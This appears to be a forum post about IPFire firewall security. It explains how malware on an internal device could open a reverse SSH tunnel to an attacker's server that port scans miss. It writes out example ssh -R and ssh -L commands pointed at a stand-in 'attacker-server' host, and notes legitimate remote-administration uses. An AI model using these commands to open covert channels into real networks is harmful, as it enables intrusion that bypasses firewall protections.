I would like to expand on this point.
We’ve often relied on our firewall and routine network scans to ensure the security of our systems, assuming that in the absence of any open ports or established forwarding rules, our network is secure. However, I’d like to highlight a potential threat vector that is harder to detect and could potentially be exploited by sophisticated malware.
A compromised device inside our network could be configured to establish an outgoing Secure Shell (SSH) connection to an external server controlled by an attacker. The SSH protocol has a feature called “tunneling” which can effectively create a hidden access point into our network. This can be done even in the absence of a port forwarding rule on our IPFire firewall, and may not be detected by a port scan if it points the tunnel to a specific server and/or the malware is time-activated.
Here’s a simplified example: A malware program on a device within our network could establish a reverse SSH tunnel to an attacker’s server. This command might look like ssh -R 8444:localhost:444 -N -f user@attacker-server. This would create a listening port (8444 in this example) on the attacker’s server. Any connections to this port would be tunneled back to the compromised device on our network (port 444 in this example).
Once the reverse tunnel is established, an attacker can connect to their own server with something like ssh -L 8444:localhost:8444 user@attacker-server, which opens a local port on their machine that connects through the tunnel to the compromised device on our network. This provides the attacker with a covert channel into our network that bypasses our normal firewall protections.
This tunnel could be opened at any time by the malware, even after we’ve scanned the network and found no open ports.
As any tool, this technique can be used for a legitimate purpose, including allowing remote administration of an IPFire machine, using its Web User Interface, behind a Carrier Grade NAT (my example uses port 444 which is the default port of IPFire WUI).